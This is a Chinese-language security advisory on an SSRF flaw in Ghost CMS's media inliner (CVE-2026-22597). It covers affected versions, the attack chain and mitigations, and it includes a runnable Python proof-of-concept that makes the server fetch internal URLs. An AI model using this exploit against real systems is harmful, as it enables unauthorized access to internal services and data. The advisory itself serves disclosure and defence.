CVE-2026-22597: Ghost CMS媒体内联功能SSRF漏洞导致内部数据泄露

漏洞信息

漏洞编号

CVE-2026-22597

漏洞类型

服务端请求伪造（SSRF）

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Ghost CMS（Node.js内容管理系统）

漏洞概述

CVE-2026-22597是Ghost内容管理系统中的一个服务端请求伪造（SSRF）漏洞。Ghost是一款基于Node.js开发的开源博客和内容管理平台，广泛应用于个人博客、企业网站和在线出版物。该漏洞存在于Ghost的媒体内联（media inliner）机制中，影响版本5.38.0至5.130.5和6.0.0至6.10.3。攻击者需要拥有Ghost Admin API的有效身份验证令牌，这意味着只有具备工作人员（staff）权限的用户才能利用此漏洞。一旦攻击者成功利用，可以通过构造特殊的请求，迫使Ghost服务器向内部系统发起请求，从而实现对内部敏感数据的非法访问和数据泄露。此漏洞的CVSS评分为2.7，属于低危级别，主要影响系统的机密性。官方已在5.130.6和6.11.0版本中修复了此问题，建议所有使用受影响版本的用户尽快升级。

技术细节

该SSRF漏洞源于Ghost的媒体内联功能未对用户提供的URL进行充分的验证和过滤。媒体内联机制允许用户通过Ghost Admin API提交外部媒体资源的URL，系统会自动获取并处理这些资源。攻击者（拥有有效认证令牌的工作人员用户）可以构造包含内部网络地址的URL，如http://127.0.0.1:port/path、http://localhost/、或内部IP地址，诱导Ghost服务器向这些内部端点发起HTTP请求。由于请求是由服务器端发起的，攻击者可以绕过网络边界限制，访问本不应该对外暴露的内部服务，如内部API、管理接口、数据库连接信息、配置数据等。漏洞的核心问题在于：1）缺乏对URL目的地和协议类型的严格验证；2）未对内部IP范围进行限制；3）未实现请求跳转（redirect）次数限制和目标主机的白名单机制。攻击者可以利用此漏洞探测内网拓扑结构、获取内部服务返回的敏感信息，甚至在某些情况下通过内部服务的漏洞进一步扩大攻击面。

攻击链分析

STEP 1

信息收集

攻击者获取Ghost实例的管理员或工作人员账户凭据，或通过其他手段获取有效的Ghost Admin API认证令牌

STEP 2

构造恶意请求

攻击者利用Ghost Admin API的媒体内联功能，构造包含内部网络地址（如127.0.0.1、localhost、内部IP）的URL作为payload

STEP 3

发送SSRF请求

攻击者向/ghost/api/admin/inliner/端点发送POST请求，包含恶意的内部URL，诱导Ghost服务器发起请求

STEP 4

内部服务响应

Ghost服务器向攻击者指定的内部地址发起HTTP请求，获取内部服务的响应数据

STEP 5

数据提取

攻击者接收Ghost服务器返回的内部服务响应，从而获取敏感信息，如内部API数据、配置信息、服务状态等

STEP 6

横向移动（可选）

如果获取到更多凭据或内部服务漏洞信息，攻击者可能进一步扩大攻击范围，访问更多内部资源

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-22597 PoC - Ghost CMS SSRF via Media Inliner
# This PoC demonstrates how an authenticated staff user can exploit 
# the SSRF vulnerability in Ghost's media inliner mechanism

import requests
import json
import sys

def exploit_ghost_ssrf(ghost_url, admin_token, target_internal_url):
    """
    Exploit SSRF in Ghost media inliner to access internal resources.
    
    Args:
        ghost_url: Base URL of Ghost instance
        admin_token: Valid Ghost Admin API token
        target_internal_url: Internal URL to target (e.g., http://127.0.0.1:8080/admin/api)
    
    Returns:
        Response data from internal service
    """
    
    # Ghost Admin API endpoint for media inliner
    endpoint = f"{ghost_url}/ghost/api/admin/inliner/"
    
    headers = {
        "Authorization": f"Ghost {admin_token}",
        "Content-Type": "application/json"
    }
    
    # Payload exploiting SSRF in media inliner
    payload = {
        "url": target_internal_url,
        "type": "media"
    }
    
    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        return {
            "status_code": response.status_code,
            "response": response.text,
            "target_url": target_internal_url
        }
    except requests.exceptions.RequestException as e:
        return {"error": str(e), "target_url": target_internal_url}

def main():
    if len(sys.argv) < 4:
        print("Usage: python cve-2026-22597.py <ghost_url> <admin_token> <target_url>")
        print("Example: python cve-2026-22597.py http://ghost.local:2368 <token> http://127.0.0.1:8080/internal/api")
        sys.exit(1)
    
    ghost_url = sys.argv[1]
    admin_token = sys.argv[2]
    target_url = sys.argv[3]
    
    print(f"[*] Targeting Ghost instance: {ghost_url}")
    print(f"[*] Exploiting SSRF to access: {target_url}")
    
    result = exploit_ghost_ssrf(ghost_url, admin_token, target_url)
    print(f"\n[+] Result: {json.dumps(result, indent=2)}")

if __name__ == "__main__":
    main()

影响范围

Ghost CMS 5.38.0 - 5.130.5

Ghost CMS 6.0.0 - 6.10.3

防御指南

临时缓解措施

立即将Ghost CMS升级至5.130.6或6.11.0版本以修复此漏洞。如果暂时无法升级，应限制Admin API的访问权限，确保只有绝对必要的工作人员账户才能访问，并考虑在Web应用防火墙（WAF）层面添加针对内网IP段（10.0.0.0/8、172.16.0.0/12、192.168.0.0/16、127.0.0.0/8）的请求过滤规则。同时，监控Ghost服务器的所有出站HTTP请求，以便及时发现异常的SSRF攻击行为。